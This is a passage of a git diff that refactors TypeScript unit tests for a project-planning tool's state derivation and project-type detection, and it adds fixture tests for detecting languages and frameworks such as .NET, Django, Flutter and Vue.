+      const worktreeDir = join(base, '.gsd', 'worktrees', 'M002');
+      mkdirSync(worktreeDir, { recursive: true });
+
+      // isGhostMilestone should return false because the worktree exists
+      assert.ok(!isGhostMilestone(base, 'M002'), 'M002 with worktree should NOT be a ghost');
+
+      // Also create a completed M001 so deriveState has something before M002
+      writeMilestoneSummary(base, 'M001', '# M001 Summary\n\nDone.');
+
+      const state = await deriveState(base);
+      // M002 should appear in the registry (not filtered as ghost)
+      const m002Entry = state.registry.find(e => e.id === 'M002');
+      assert.ok(m002Entry !== undefined, 'M002 should be in registry when worktree exists');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M002', 'M002 should be active milestone');
+    } finally {
+      cleanup(base);
+    }
+  });
 
   // ─── Test: zero-slice roadmap → pre-planning, not blocked (#1785) ────
-  console.log('\n=== zero-slice roadmap → pre-planning, not blocked (#1785) ===');
-  {
+  test('zero-slice roadmap → pre-planning, not blocked (#1785)', async () => {
     const base = createFixtureBase();
     try {
       // Write a stub roadmap with zero slices (placeholder text, no slice definitions)
@@ -967,22 +968,15 @@ slice: S01
 
       const state = await deriveState(base);
 
-      assertEq(state.phase, 'pre-planning', 'phase is pre-planning when roadmap has zero slices');
-      assertTrue(state.activeMilestone !== null, 'activeMilestone is set');
-      assertEq(state.activeMilestone?.id, 'M001', 'activeMilestone is M001');
-      assertEq(state.activeSlice, null, 'activeSlice is null');
-      assertEq(state.activeTask, null, 'activeTask is null');
-      assertEq(state.blockers.length, 0, 'no blockers reported');
-      assertTrue(state.nextAction.includes('M001'), 'nextAction references M001');
+      assert.deepStrictEqual(state.phase, 'pre-planning', 'phase is pre-planning when roadmap has zero slices');
+      assert.ok(state.activeMilestone !== null, 'activeMilestone is set');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M001', 'activeMilestone is M001');
+      assert.deepStrictEqual(state.activeSlice, null, 'activeSlice is null');
+      assert.deepStrictEqual(state.activeTask, null, 'activeTask is null');
+      assert.deepStrictEqual(state.blockers.length, 0, 'no blockers reported');
+      assert.ok(state.nextAction.includes('M001'), 'nextAction references M001');
     } finally {
       cleanup(base);
     }
-  }
-
-  report();
-}
-
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
+  });
 });
diff --git a/src/resources/extensions/gsd/tests/detection.test.ts b/src/resources/extensions/gsd/tests/detection.test.ts
index 8e68524e1..25843ca7a 100644
--- a/src/resources/extensions/gsd/tests/detection.test.ts
+++ b/src/resources/extensions/gsd/tests/detection.test.ts
@@ -17,6 +17,7 @@ import {
   detectProjectState,
   detectV1Planning,
   detectProjectSignals,
+  scanProjectFiles,
 } from "../detection.ts";
 
 function makeTempDir(prefix: string): string {
@@ -38,360 +39,1188 @@ function cleanup(dir: string): void {
 
 // ─── detectProjectState ─────────────────────────────────────────────────────────
 
-test("detectProjectState: empty directory returns state=none", () => {
+test("detectProjectState: empty directory returns state=none", (t) => {
   const dir = makeTempDir("empty");
-  try {
-    const result = detectProjectState(dir);
-    assert.equal(result.state, "none");
-    assert.equal(result.v1, undefined);
-    assert.equal(result.v2, undefined);
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => cleanup(dir));
+
+  const result = detectProjectState(dir);
+  assert.equal(result.state, "none");
+  assert.equal(result.v1, undefined);
+  assert.equal(result.v2, undefined);
 });
 
-test("detectProjectState: directory with .gsd/milestones/M001 returns v2-gsd", () => {
+test("detectProjectState: directory with .gsd/milestones/M001 returns v2-gsd", (t) => {
   const dir = makeTempDir("v2-gsd");
-  try {
-    mkdirSync(join(dir, ".gsd", "milestones", "M001"), { recursive: true });
-    const result = detectProjectState(dir);
-    assert.equal(result.state, "v2-gsd");
-    assert.ok(result.v2);
-    assert.equal(result.v2!.milestoneCount, 1);
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => cleanup(dir));
+
+  mkdirSync(join(dir, ".gsd", "milestones", "M001"), { recursive: true });
+  const result = detectProjectState(dir);
+  assert.equal(result.state, "v2-gsd");
+  assert.ok(result.v2);
+  assert.equal(result.v2!.milestoneCount, 1);
 });
 
-test("detectProjectState: directory with empty .gsd/milestones returns v2-gsd-empty", () => {
+test("detectProjectState: directory with empty .gsd/milestones returns v2-gsd-empty", (t) => {
   const dir = makeTempDir("v2-empty");
-  try {
-    mkdirSync(join(dir, ".gsd", "milestones"), { recursive: true });
-    const result = detectProjectState(dir);
-    assert.equal(result.state, "v2-gsd-empty");
-    assert.ok(result.v2);
-    assert.equal(result.v2!.milestoneCount, 0);
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => cleanup(dir));
+
+  mkdirSync(join(dir, ".gsd", "milestones"), { recursive: true });
+  const result = detectProjectState(dir);
+  assert.equal(result.state, "v2-gsd-empty");
+  assert.ok(result.v2);
+  assert.equal(result.v2!.milestoneCount, 0);
 });
 
-test("detectProjectState: directory with .planning/ returns v1-planning", () => {
+test("detectProjectState: directory with .planning/ returns v1-planning", (t) => {
   const dir = makeTempDir("v1-planning");
-  try {
-    mkdirSync(join(dir, ".planning", "phases", "01-setup"), { recursive: true });
-    writeFileSync(join(dir, ".planning", "ROADMAP.md"), "# Roadmap\n", "utf-8");
-    const result = detectProjectState(dir);
-    assert.equal(result.state, "v1-planning");
-    assert.ok(result.v1);
-    assert.equal(result.v1!.hasRoadmap, true);
-    assert.equal(result.v1!.hasPhasesDir, true);
-    assert.equal(result.v1!.phaseCount, 1);
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => cleanup(dir));
+
+  mkdirSync(join(dir, ".planning", "phases", "01-setup"), { recursive: true });
+  writeFileSync(join(dir, ".planning", "ROADMAP.md"), "# Roadmap\n", "utf-8");
+  const result = detectProjectState(dir);
+  assert.equal(result.state, "v1-planning");
+  assert.ok(result.v1);
+  assert.equal(result.v1!.hasRoadmap, true);
+  assert.equal(result.v1!.hasPhasesDir, true);
+  assert.equal(result.v1!.phaseCount, 1);
 });
 
-test("detectProjectState: v2 takes priority over v1 when both exist", () => {
+test("detectProjectState: v2 takes priority over v1 when both exist", (t) => {
   const dir = makeTempDir("both");
-  try {
-    mkdirSync(join(dir, ".gsd", "milestones", "M001"), { recursive: true });
-    mkdirSync(join(dir, ".planning"), { recursive: true });
-    const result = detectProjectState(dir);
-    assert.equal(result.state, "v2-gsd");
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => cleanup(dir));
+
+  mkdirSync(join(dir, ".gsd", "milestones", "M001"), { recursive: true });
+  mkdirSync(join(dir, ".planning"), { recursive: true });
+  const result = detectProjectState(dir);
+  assert.equal(result.state, "v2-gsd");
 });
 
-test("detectProjectState: detects preferences in .gsd/", () => {
+test("detectProjectState: detects preferences in .gsd/", (t) => {
   const dir = makeTempDir("prefs");
-  try {
-    mkdirSync(join(dir, ".gsd", "milestones"), { recursive: true });
-    writeFileSync(join(dir, ".gsd", "preferences.md"), "---\nversion: 1\n---\n", "utf-8");
-    const result = detectProjectState(dir);
-    assert.ok(result.v2);
-    assert.equal(result.v2!.hasPreferences, true);
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => cleanup(dir));
+
+  mkdirSync(join(dir, ".gsd", "milestones"), { recursive: true });
+  writeFileSync(join(dir, ".gsd", "PREFERENCES.md"), "---\nversion: 1\n---\n", "utf-8");
+  const result = detectProjectState(dir);
+  assert.ok(result.v2);
+  assert.equal(result.v2!.hasPreferences, true);
 });
 
 // ─── detectV1Planning ───────────────────────────────────────────────────────────
 
-test("detectV1Planning: returns null for missing .planning/", () => {
+test("detectV1Planning: returns null for missing .planning/", (t) => {
   const dir = makeTempDir("no-v1");
-  try {
-    assert.equal(detectV1Planning(dir), null);
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => cleanup(dir));
+
+  assert.equal(detectV1Planning(dir), null);
 });
 
-test("detectV1Planning: returns null when .planning is a file", () => {
+test("detectV1Planning: returns null when .planning is a file", (t) => {
   const dir = makeTempDir("v1-file");
-  try {
-    writeFileSync(join(dir, ".planning"), "not a directory", "utf-8");
-    assert.equal(detectV1Planning(dir), null);
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => cleanup(dir));
+
+  writeFileSync(join(dir, ".planning"), "not a directory", "utf-8");
+  assert.equal(detectV1Planning(dir), null);
 });
 
-test("detectV1Planning: detects phases directory with multiple phases", () => {
+test("detectV1Planning: detects phases directory with multiple phases", (t) => {
   const dir = makeTempDir("v1-phases");
-  try {
-    mkdirSync(join(dir, ".planning", "phases", "01-setup"), { recursive: true });
-    mkdirSync(join(dir, ".planning", "phases", "02-core"), { recursive: true });
-    mkdirSync(join(dir, ".planning", "phases", "03-deploy"), { recursive: true });
-    const result = detectV1Planning(dir);
-    assert.ok(result);
-    assert.equal(result!.phaseCount, 3);
-    assert.equal(result!.hasPhasesDir, true);
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => cleanup(dir));
+
+  mkdirSync(join(dir, ".planning", "phases", "01-setup"), { recursive: true });
+  mkdirSync(join(dir, ".planning", "phases", "02-core"), { recursive: true });
+  mkdirSync(join(dir, ".planning", "phases", "03-deploy"), { recursive: true });
+  const result = detectV1Planning(dir);
+  assert.ok(result);
+  assert.equal(result!.phaseCount, 3);
+  assert.equal(result!.hasPhasesDir, true);
 });
 
-test("detectV1Planning: detects ROADMAP.md", () => {
+test("detectV1Planning: detects ROADMAP.md", (t) => {
   const dir = makeTempDir("v1-roadmap");
-  try {
-    mkdirSync(join(dir, ".planning"), { recursive: true });
-    writeFileSync(join(dir, ".planning", "ROADMAP.md"), "# Roadmap", "utf-8");
-    const result = detectV1Planning(dir);
-    assert.ok(result);
-    assert.equal(result!.hasRoadmap, true);
-    assert.equal(result!.hasPhasesDir, false);
-    assert.equal(result!.phaseCount, 0);
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => cleanup(dir));
+
+  mkdirSync(join(dir, ".planning"), { recursive: true });
+  writeFileSync(join(dir, ".planning", "ROADMAP.md"), "# Roadmap", "utf-8");
+  const result = detectV1Planning(dir);
+  assert.ok(result);
+  assert.equal(result!.hasRoadmap, true);
+  assert.equal(result!.hasPhasesDir, false);
+  assert.equal(result!.phaseCount, 0);
 });
 
 // ─── detectProjectSignals ───────────────────────────────────────────────────────
 
-test("detectProjectSignals: empty directory", () => {
+test("detectProjectSignals: empty directory", (t) => {
   const dir = makeTempDir("signals-empty");
-  try {
-    const signals = detectProjectSignals(dir);
-    assert.deepEqual(signals.detectedFiles, []);
-    assert.equal(signals.isGitRepo, false);
-    assert.equal(signals.isMonorepo, false);
-    assert.equal(signals.primaryLanguage, undefined);
-    assert.equal(signals.hasCI, false);
-    assert.equal(signals.hasTests, false);
-    assert.deepEqual(signals.verificationCommands, []);
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => cleanup(dir));
+
+  const signals = detectProjectSignals(dir);
+  assert.deepEqual(signals.detectedFiles, []);
+  assert.equal(signals.isGitRepo, false);
+  assert.equal(signals.isMonorepo, false);
+  assert.equal(signals.primaryLanguage, undefined);
+  assert.equal(signals.hasCI, false);
+  assert.equal(signals.hasTests, false);
+  assert.deepEqual(signals.verificationCommands, []);
 });
 
-test("detectProjectSignals: Node.js project", () => {
+test("detectProjectSignals: Node.js project", (t) => {
   const dir = makeTempDir("signals-node");
-  try {
-    writeFileSync(
-      join(dir, "package.json"),
-      JSON.stringify({
-        name: "test-project",
-        scripts: {
-          test: "jest",
-          build: "tsc",
-          lint: "eslint .",
-        },
-      }),
-      "utf-8",
-    );
-    writeFileSync(join(dir, "package-lock.json"), "{}", "utf-8");
-    mkdirSync(join(dir, ".git"), { recursive: true });
+  t.after(() => cleanup(dir));
 
-    const signals = detectProjectSignals(dir);
-    assert.ok(signals.detectedFiles.includes("package.json"));
-    assert.equal(signals.primaryLanguage, "javascript/typescript");
-    assert.equal(signals.isGitRepo, true);
-    assert.equal(signals.packageManager, "npm");
-    assert.ok(signals.verificationCommands.includes("npm test"));
-    assert.ok(signals.verificationCommands.some(c => c.includes("build")));
-    assert.ok(signals.verificationCommands.some(c => c.includes("lint")));
-  } finally {
-    cleanup(dir);
-  }
+  writeFileSync(
+    join(dir, "package.json"),
+    JSON.stringify({
+      name: "test-project",
+      scripts: {
+        test: "jest",
+        build: "tsc",
+        lint: "eslint .",
+      },
+    }),
+    "utf-8",
+  );
+  writeFileSync(join(dir, "package-lock.json"), "{}", "utf-8");
+  mkdirSync(join(dir, ".git"), { recursive: true });
+
+  const signals = detectProjectSignals(dir);
+  assert.ok(signals.detectedFiles.includes("package.json"));
+  assert.equal(signals.primaryLanguage, "javascript/typescript");
+  assert.equal(signals.isGitRepo, true);
+  assert.equal(signals.packageManager, "npm");
+  assert.ok(signals.verificationCommands.includes("npm test"));
+  assert.ok(signals.verificationCommands.some(c => c.includes("build")));
+  assert.ok(signals.verificationCommands.some(c => c.includes("lint")));
 });
 
-test("detectProjectSignals: Rust project", () => {
+test("detectProjectSignals: Rust project", (t) => {
   const dir = makeTempDir("signals-rust");
-  try {
-    writeFileSync(join(dir, "Cargo.toml"), '[package]\nname = "test"\n', "utf-8");
-    const signals = detectProjectSignals(dir);
-    assert.ok(signals.detectedFiles.includes("Cargo.toml"));
-    assert.equal(signals.primaryLanguage, "rust");
-    assert.ok(signals.verificationCommands.includes("cargo test"));
-    assert.ok(signals.verificationCommands.includes("cargo clippy"));
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => cleanup(dir));
+
+  writeFileSync(join(dir, "Cargo.toml"), '[package]\nname = "test"\n', "utf-8");
+  const signals = detectProjectSignals(dir);
+  assert.ok(signals.detectedFiles.includes("Cargo.toml"));
+  assert.equal(signals.primaryLanguage, "rust");
+  assert.ok(signals.verificationCommands.includes("cargo test"));
+  assert.ok(signals.verificationCommands.includes("cargo clippy"));
 });
 
-test("detectProjectSignals: Go project", () => {
+test("detectProjectSignals: Go project", (t) => {
   const dir = makeTempDir("signals-go");
-  try {
-    writeFileSync(join(dir, "go.mod"), "module example.com/test\n", "utf-8");
-    const signals = detectProjectSignals(dir);
-    assert.ok(signals.detectedFiles.includes("go.mod"));
-    assert.equal(signals.primaryLanguage, "go");
-    assert.ok(signals.verificationCommands.includes("go test ./..."));
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => cleanup(dir));
+
+  writeFileSync(join(dir, "go.mod"), "module example.com/test\n", "utf-8");
+  const signals = detectProjectSignals(dir);
+  assert.ok(signals.detectedFiles.includes("go.mod"));
+  assert.equal(signals.primaryLanguage, "go");
+  assert.ok(signals.verificationCommands.includes("go test ./..."));
 });
 
-test("detectProjectSignals: Python project", () => {
+test("detectProjectSignals: Python project", (t) => {
   const dir = makeTempDir("signals-python");
-  try {
-    writeFileSync(join(dir, "pyproject.toml"), "[tool.poetry]\n", "utf-8");
-    const signals = detectProjectSignals(dir);
-    assert.ok(signals.detectedFiles.includes("pyproject.toml"));
-    assert.equal(signals.primaryLanguage, "python");
-    assert.ok(signals.verificationCommands.includes("pytest"));
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => cleanup(dir));
+
+  writeFileSync(join(dir, "pyproject.toml"), "[tool.poetry]\n", "utf-8");
+  const signals = detectProjectSignals(dir);
+  assert.ok(signals.detectedFiles.includes("pyproject.toml"));
+  assert.equal(signals.primaryLanguage, "python");
+  assert.ok(signals.verificationCommands.includes("pytest"));
 });
 
-test("detectProjectSignals: monorepo detection via workspaces", () => {
+test("detectProjectSignals: monorepo detection via workspaces", (t) => {
   const dir = makeTempDir("signals-monorepo");
-  try {
-    writeFileSync(
-      join(dir, "package.json"),
-      JSON.stringify({ name: "mono", workspaces: ["packages/*"] }),
-      "utf-8",
-    );
-    const signals = detectProjectSignals(dir);
-    assert.equal(signals.isMonorepo, true);
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => cleanup(dir));
+
+  writeFileSync(
+    join(dir, "package.json"),
+    JSON.stringify({ name: "mono", workspaces: ["packages/*"] }),
+    "utf-8",
+  );
+  const signals = detectProjectSignals(dir);
+  assert.equal(signals.isMonorepo, true);
 });
 
-test("detectProjectSignals: monorepo detection via turbo.json", () => {
+test("detectProjectSignals: monorepo detection via turbo.json", (t) => {
   const dir = makeTempDir("signals-turbo");
-  try {
-    writeFileSync(join(dir, "package.json"), JSON.stringify({ name: "test" }), "utf-8");
-    writeFileSync(join(dir, "turbo.json"), "{}", "utf-8");
-    const signals = detectProjectSignals(dir);
-    assert.equal(signals.isMonorepo, true);
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => cleanup(dir));
+
+  writeFileSync(join(dir, "package.json"), JSON.stringify({ name: "test" }), "utf-8");
+  writeFileSync(join(dir, "turbo.json"), "{}", "utf-8");
+  const signals = detectProjectSignals(dir);
+  assert.equal(signals.isMonorepo, true);
 });
 
-test("detectProjectSignals: CI detection", () => {
+test("detectProjectSignals: CI detection", (t) => {
   const dir = makeTempDir("signals-ci");
-  try {
-    mkdirSync(join(dir, ".github", "workflows"), { recursive: true });
-    const signals = detectProjectSignals(dir);
-    assert.equal(signals.hasCI, true);
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => cleanup(dir));
+
+  mkdirSync(join(dir, ".github", "workflows"), { recursive: true });
+  const signals = detectProjectSignals(dir);
+  assert.equal(signals.hasCI, true);
 });
 
-test("detectProjectSignals: test detection via jest config", () => {
+test("detectProjectSignals: test detection via jest config", (t) => {
   const dir = makeTempDir("signals-tests");
-  try {
-    writeFileSync(join(dir, "jest.config.ts"), "export default {}", "utf-8");
-    const signals = detectProjectSignals(dir);
-    assert.equal(signals.hasTests, true);
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => cleanup(dir));
+
+  writeFileSync(join(dir, "jest.config.ts"), "export default {}", "utf-8");
+  const signals = detectProjectSignals(dir);
+  assert.equal(signals.hasTests, true);
 });
 
-test("detectProjectSignals: package manager detection", () => {
+test("detectProjectSignals: package manager detection", (t) => {
   const dir1 = makeTempDir("pm-pnpm");
   const dir2 = makeTempDir("pm-yarn");
   const dir3 = makeTempDir("pm-bun");
-  try {
-    writeFileSync(join(dir1, "pnpm-lock.yaml"), "", "utf-8");
-    writeFileSync(join(dir1, "package.json"), "{}", "utf-8");
-    assert.equal(detectProjectSignals(dir1).packageManager, "pnpm");
-
-    writeFileSync(join(dir2, "yarn.lock"), "", "utf-8");
-    writeFileSync(join(dir2, "package.json"), "{}", "utf-8");
-    assert.equal(detectProjectSignals(dir2).packageManager, "yarn");
-
-    writeFileSync(join(dir3, "bun.lockb"), "", "utf-8");
-    writeFileSync(join(dir3, "package.json"), "{}", "utf-8");
-    assert.equal(detectProjectSignals(dir3).packageManager, "bun");
-  } finally {
+  t.after(() => {
     cleanup(dir1);
     cleanup(dir2);
     cleanup(dir3);
-  }
+  });
+
+  writeFileSync(join(dir1, "pnpm-lock.yaml"), "", "utf-8");
+  writeFileSync(join(dir1, "package.json"), "{}", "utf-8");
+  assert.equal(detectProjectSignals(dir1).packageManager, "pnpm");
+
+  writeFileSync(join(dir2, "yarn.lock"), "", "utf-8");
+  writeFileSync(join(dir2, "package.json"), "{}", "utf-8");
+  assert.equal(detectProjectSignals(dir2).packageManager, "yarn");
+
+  writeFileSync(join(dir3, "bun.lockb"), "", "utf-8");
+  writeFileSync(join(dir3, "package.json"), "{}", "utf-8");
+  assert.equal(detectProjectSignals(dir3).packageManager, "bun");
 });
 
-test("detectProjectSignals: skips default npm test script", () => {
+test("detectProjectSignals: skips default npm test script", (t) => {
   const dir = makeTempDir("signals-default-test");
-  try {
-    writeFileSync(
-      join(dir, "package.json"),
-      JSON.stringify({
-        name: "test",
-        scripts: { test: 'echo "Error: no test specified" && exit 1' },
-      }),
-      "utf-8",
-    );
-    const signals = detectProjectSignals(dir);
-    // Should NOT include the default npm test script
-    assert.equal(
-      signals.verificationCommands.some(c => c.includes("test")),
-      false,
-    );
-  } finally {
-    cleanup(dir);
-  }
+  t.after(() => cleanup(dir));
+
+  writeFileSync(
+    join(dir, "package.json"),
+    JSON.stringify({
+      name: "test",
+      scripts: { test: 'echo "Error: no test specified" && exit 1' },
+    }),
+    "utf-8",
+  );
+  const signals = detectProjectSignals(dir);
+  // Should NOT include the default npm test script
+  assert.equal(
+    signals.verificationCommands.some(c => c.includes("test")),
+    false,
+  );
 });
 
-test("detectProjectSignals: pnpm uses pnpm commands", () => {
+test("detectProjectSignals: pnpm uses pnpm commands", (t) => {
   const dir = makeTempDir("signals-pnpm-cmds");
+  t.after(() => cleanup(dir));
+
+  writeFileSync(
+    join(dir, "package.json"),
+    JSON.stringify({
+      name: "test",
+      scripts: { test: "vitest", build: "tsc" },
+    }),
+    "utf-8",
+  );
+  writeFileSync(join(dir, "pnpm-lock.yaml"), "", "utf-8");
+  const signals = detectProjectSignals(dir);
+  assert.ok(signals.verificationCommands.includes("pnpm test"));
+  assert.ok(signals.verificationCommands.includes("pnpm run build"));
+});
+
+test("detectProjectSignals: Ruby project with rspec", (t) => {
+  const dir = makeTempDir("signals-ruby");
+  t.after(() => cleanup(dir));
+
+  writeFileSync(join(dir, "Gemfile"), 'source "https://rubygems.org"\n', "utf-8");
+  mkdirSync(join(dir, "spec"), { recursive: true });
+  const signals = detectProjectSignals(dir);
+  assert.ok(signals.detectedFiles.includes("Gemfile"));
+  assert.equal(signals.primaryLanguage, "ruby");
+  assert.ok(signals.verificationCommands.includes("bundle exec rspec"));
+});
+
+test("detectProjectSignals: Makefile with test target", (t) => {
+  const dir = makeTempDir("signals-make");
+  t.after(() => cleanup(dir));
+
+  writeFileSync(join(dir, "Makefile"), "test:\n\tgo test ./...\n\nbuild:\n\tgo build\n", "utf-8");
+  const signals = detectProjectSignals(dir);
+  assert.ok(signals.detectedFiles.includes("Makefile"));
+  assert.ok(signals.verificationCommands.includes("make test"));
+});
+
+test("detectProjectSignals: SQLite file detection via extensions", () => {
+  const dir = makeTempDir("signals-sqlite");
+  try {
+    writeFileSync(join(dir, "app.sqlite3"), "", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("*.sqlite"), "should add synthetic *.sqlite marker");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: SQL file detection", () => {
+  const dir = makeTempDir("signals-sql");
+  try {
+    writeFileSync(join(dir, "migrations.sql"), "", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("*.sql"), "should add synthetic *.sql marker");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: nested SQL file detection", () => {
+  const dir = makeTempDir("signals-sql-nested");
+  try {
+    mkdirSync(join(dir, "db", "migrations"), { recursive: true });
+    writeFileSync(join(dir, "db", "migrations", "001_init.sql"), "", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("*.sql"), "should detect nested SQL files");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: .db file triggers SQLite detection", () => {
+  const dir = makeTempDir("signals-db");
+  try {
+    writeFileSync(join(dir, "data.db"), "", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("*.sqlite"), "should add synthetic *.sqlite marker for .db files");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: no SQLite markers without matching files", () => {
+  const dir = makeTempDir("signals-no-sqlite");
+  try {
+    writeFileSync(join(dir, "package.json"), "{}", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(!signals.detectedFiles.includes("*.sqlite"), "should not have *.sqlite marker");
+    assert.ok(!signals.detectedFiles.includes("*.sql"), "should not have *.sql marker");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: .NET project via .csproj extension", () => {
+  const dir = makeTempDir("signals-dotnet");
+  try {
+    writeFileSync(join(dir, "MyApp.csproj"), "<Project></Project>", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("*.csproj"), "should add synthetic *.csproj marker");
+    assert.equal(signals.primaryLanguage, "csharp");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: nested .csproj detection", () => {
+  const dir = makeTempDir("signals-dotnet-nested");
+  try {
+    mkdirSync(join(dir, "src", "App"), { recursive: true });
+    writeFileSync(join(dir, "src", "App", "App.csproj"), "<Project></Project>", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("*.csproj"), "should detect nested .csproj files");
+    assert.equal(signals.primaryLanguage, "csharp");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: .NET project via .sln extension", () => {
+  const dir = makeTempDir("signals-sln");
+  try {
+    writeFileSync(join(dir, "MyApp.sln"), "", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("*.sln"), "should add synthetic *.sln marker for .sln files");
+    assert.equal(signals.primaryLanguage, "dotnet");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: F# project via .fsproj extension", () => {
+  const dir = makeTempDir("signals-fsharp");
+  try {
+    writeFileSync(join(dir, "MyApp.fsproj"), "<Project></Project>", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("*.fsproj"), "should add synthetic *.fsproj marker");
+    assert.equal(signals.primaryLanguage, "fsharp");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Angular project via angular.json", () => {
+  const dir = makeTempDir("signals-angular");
+  try {
+    writeFileSync(join(dir, "angular.json"), "{}", "utf-8");
+    writeFileSync(join(dir, "package.json"), "{}", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("angular.json"));
+    assert.equal(signals.primaryLanguage, "javascript/typescript");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Next.js project via next.config.ts", () => {
+  const dir = makeTempDir("signals-nextjs");
+  try {
+    writeFileSync(join(dir, "next.config.ts"), "export default {}", "utf-8");
+    writeFileSync(join(dir, "package.json"), "{}", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("next.config.ts"));
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: nested Next.js config via packages/web/next.config.ts", () => {
+  const dir = makeTempDir("signals-nextjs-nested");
+  try {
+    mkdirSync(join(dir, "packages", "web"), { recursive: true });
+    writeFileSync(join(dir, "packages", "web", "next.config.ts"), "export default {}", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("next.config.ts"), "should detect nested Next.js config");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Flutter project via pubspec.yaml", () => {
+  const dir = makeTempDir("signals-flutter");
+  try {
+    writeFileSync(join(dir, "pubspec.yaml"), "name: my_app", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("pubspec.yaml"));
+    assert.equal(signals.primaryLanguage, "dart/flutter");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Django project via manage.py", () => {
+  const dir = makeTempDir("signals-django");
+  try {
+    writeFileSync(join(dir, "manage.py"), "#!/usr/bin/env python", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("manage.py"));
+    assert.equal(signals.primaryLanguage, "python");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: nested Django manage.py", () => {
+  const dir = makeTempDir("signals-django-nested");
+  try {
+    mkdirSync(join(dir, "services", "api"), { recursive: true });
+    writeFileSync(join(dir, "services", "api", "manage.py"), "#!/usr/bin/env python", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("manage.py"), "should detect nested manage.py");
+    assert.equal(signals.primaryLanguage, "python");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Docker project via Dockerfile", () => {
+  const dir = makeTempDir("signals-docker");
+  try {
+    writeFileSync(join(dir, "Dockerfile"), "FROM node:18", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("Dockerfile"));
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Terraform project via main.tf", () => {
+  const dir = makeTempDir("signals-terraform");
+  try {
+    writeFileSync(join(dir, "main.tf"), 'provider "aws" {}', "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("main.tf"));
+  } finally {
+    cleanup(dir);
+  }
+});
+
+// ── QA4/QA5 — new detection tests ──────────────────────────────────────────
+
+test("detectProjectSignals: Vue.js via .vue files in src/", () => {
+  const dir = makeTempDir("signals-vue");
+  try {
+    writeFileSync(join(dir, "package.json"), '{"name":"vue-app"}', "utf-8");
+    mkdirSync(join(dir, "src"), { recursive: true });
+    writeFileSync(join(dir, "src", "App.vue"), "<template></template>", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("*.vue"), "should add *.vue synthetic marker");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Vue.js via nested .vue file in src/components/", () => {
+  const dir = makeTempDir("signals-vue-nested");
+  try {
+    writeFileSync(join(dir, "package.json"), '{"name":"vue-app"}', "utf-8");
+    mkdirSync(join(dir, "src", "components"), { recursive: true });
+    writeFileSync(join(dir, "src", "components", "Card.vue"), "<template></template>", "utf-8");
+    const signals = detectProjectSignals(dir);
+    assert.ok(signals.detectedFiles.includes("*.vue"), "should detect nested .vue files");
+  } finally {
+    cleanup(dir);
+  }
+});
+
+test("detectProjectSignals: Vue CLI via vue.config.js", () => {
+  const dir = makeTempDir("signals-vue-cli");
+  try {
+    writeFileSync(join(dir, "package.json"), '{"name":"vue-cli-app"}', "utf-8");
